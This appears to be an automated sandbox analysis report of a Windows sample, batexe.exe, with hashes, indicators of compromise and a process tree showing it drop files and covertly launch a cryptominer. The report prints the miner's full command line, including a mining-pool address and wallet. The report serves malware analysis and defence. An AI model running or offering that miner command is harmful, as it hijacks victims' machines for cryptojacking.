73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
304s
platform
windows10-1703_x64
resource
win10-20240214-ja
resource tags

arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
19/02/2024, 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3152	b2e.exe
4892	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4892	cpuminer-sse2.exe
4892	cpuminer-sse2.exe
4892	cpuminer-sse2.exe
4892	cpuminer-sse2.exe
4892	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1488-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1488 wrote to memory of 3152	1488	batexe.exe	46
PID 1488 wrote to memory of 3152	1488	batexe.exe	46
PID 1488 wrote to memory of 3152	1488	batexe.exe	46
PID 3152 wrote to memory of 4968	3152	b2e.exe	68
PID 3152 wrote to memory of 4968	3152	b2e.exe	68
PID 3152 wrote to memory of 4968	3152	b2e.exe	68
PID 4968 wrote to memory of 4892	4968	cmd.exe	71
PID 4968 wrote to memory of 4892	4968	cmd.exe	71

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1488
- C:\Users\Admin\AppData\Local\Temp\A73C.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\A73C.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\A73C.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3152
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A95F.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\A73C.tmp\b2e.exe

Filesize
456KB

MD5
17f7ee2d79539d215a000f6e52ada2a6

SHA1
231fb3753baee020aa9837e4514dbc0b47dd45b4

SHA256
73c1861f15b4c3e9b52d7604691de8c96f2542351cbc6754d60cfed0fd925ac0

SHA512
5fc5cb73878ccadd6cd35e91d7ca3ab6581ec5b93518049ba004b2cb5f93d7cf0cfced20105db4fbfdf2220a105e71ec5e9b67657770ab7190f1e638a4484216

Download Submit
C:\Users\Admin\AppData\Local\Temp\A73C.tmp\b2e.exe

Filesize
567KB

MD5
54e9ab4c46a4ec18b478f05ac38ed13f

SHA1
23f01ad76cc34f3dfab7ef55c70e98346b25ba28

SHA256
1cb9b567b1019aa29e674db15bcf7e6b84ac114c379edcb92da5a2685e7fab0a

SHA512
0eb365bb85f18a222e4190a48e90b28a252c785cd262924b643ee40d5d8d152eeb4ac549b2f31b6d32f69deac225eec16dc0b0ccd1e40f123f0ec2e663cd03c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\A95F.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
476KB

MD5
e34aea724d291416a0a7aec8c21689ca

SHA1
6882f521929555625cc4f6c91c2e93db26607d13

SHA256
ae62db60713f48fffb31cef1d5e70177365120f513807d272f02ddd341732740

SHA512
538ace8e9b215dd1971f30d89a1b23f87984721b0b963f027c8933276a7c45980b7fb9e258c5a03e6e5d469e9e60e141b839f1e8509d1f84d26bb8026ad31aa0

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
92KB

MD5
e727c96c1f4c853a6b2e00c03110bc90

SHA1
b4179d244c3b16e8ec70424e37ffc37a016f6775

SHA256
556aa4087990a2160c34c55fea1bfc3dd614824a7e8cf2631511a18d36993295

SHA512
add2f735bc54cd9cb2b22750384ff2d2dba79de3dec0ad9a9219db6dc01636e5a56182ffec012f8137d055198917ed91f02d08ed3b2ce8b05c93b0ed9d1a8843

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
48KB

MD5
5fd7f94c0e30396812566fee9df1242d

SHA1
d0828bfe42056cf021718cd2c63a00df7d7f07eb

SHA256
ebb887107016763d68623d33a291cf9ee594c81c21b0692c97e0d2d3dd124fcc

SHA512
0a4a05a433557a08802bc33ac322359418d679a07b892aad06040aa7c1625c159b03010fe173eb8a5c0fb7f73bf3edb7fafa13ebb0e96371200fed77cf183366

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
35KB

MD5
9e25aa436ae0ee633a8d3dbeb158b697

SHA1
1a971b360b2e3b42caff4197e03efb39567b0e1c

SHA256
1ef6cdeef1ab464b69349192518001bae2c5bbe3c4c109a8f46fc51faf7fa4c1

SHA512
742e293ec276bebb7ada41d3b82ef1403165f35e6d91945af145ed25434fe7f94eed85f7fe8fe90d434fd4b04728eaf8585cdf2403cc256b9b92ae98e505c693

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
183KB

MD5
74c65c10e0772ebf99646ff806971265

SHA1
732d478bea61877d3143b41ba34f0141464e7e37

SHA256
5dfeb85b382f2c8d0803293a90c49b6d5a785927ea582303b3487d22feb41260

SHA512
82824421f030a44e0384749422673b617f8a2f056166286ffa736d6e255a32d0b1c8384760627cc0f47d2243d0da64122c1340acaa0864818bac651e3278c60a

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
96KB

MD5
767c4dd8bf4a863c700f9f6e6fee4d9e

SHA1
d734dbbbc3b4dd7abbc8ac70b4b7b3ee2006227c

SHA256
d42d3f4b4ad335b6d251766cd6753bc450c637dd6b7855d213e051b3b4d6ccc8

SHA512
40550f5dcab9dca52e4e920ef94e9a231b2bb908b8f82a6f80362f19ca7abb75687a63ff5b890ed08703767b6caef784be5ec621a2865f35f7b21bd79dbc08d8

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
75KB

MD5
8946dda31ae748c306d4d29f5244bd76

SHA1
f23cb2dd56b7733b9a07e0c183d0831c1228c791

SHA256
872be8f83c1b2a5b62d8569d77f52a8870bd30f5bea221532936330a04213716

SHA512
4bea9ee54918de23558c3dd34a0dbb9533c222d38d9451bc20c33bb685d7474f213f16f5f7359cce7209098899f825f21814862f7483f82165a33dc18f671100

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
64KB

MD5
e98583e2f3157ea2561f40a91a79b195

SHA1
770932f48dbea7a78a3b21e3df65e329a27313ff

SHA256
f6b3de2ac1e9c449daf82a3bd6fa52d2ed60e73e8cdd25d5d2194586a8d10de2

SHA512
cfa97067447a389dc5439dc42ca467f97947fa7010314cad0b99655688361721720bb33e34a1c7b22c93d807327b756109f63d15a40df5aaec620b0d0e1acc7f

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
192KB

MD5
62069650d62f76a4cdf0e81172d99993

SHA1
3b20ec5b4a4320ee15b0f7b9715a9ab90f68346e

SHA256
779a5590c667d9a704b79e159259c0646737394fd66a9c0b12d13f9445ca091c

SHA512
ae1954a84fb7543465e77a4cd5cc1bdeee0cf848592958633e6c51702b42131daae64c302d5c9537c59a9b3ba9498e5bf913d1f6f757ccdb8c4183b33224852b

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
75KB

MD5
9f981d5d423fb3f351b226520cc03d6f

SHA1
9993095b3affcce8665389692d00bd59295f0b45

SHA256
4af1985a7870a43072a98fbcb4c9a1ae7711a8553e8be9b314676772fdced284

SHA512
151779460e88504423f3e69f03cb67d0586b23a3eaf34016ad97e4b1842545b4c001b3b521249353c85ec98e1a4c24f3b7ff49715d18a5aafff663976b6e2db7

Download Submit
memory/1488-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3152-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3152-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4892-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-43-0x0000000051EF0000-0x0000000051F88000-memory.dmp

Filesize
608KB

Download
memory/4892-42-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4892-44-0x00000000010A0000-0x0000000002955000-memory.dmp

Filesize
24.7MB

Download
memory/4892-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-41-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4892-51-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4892-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download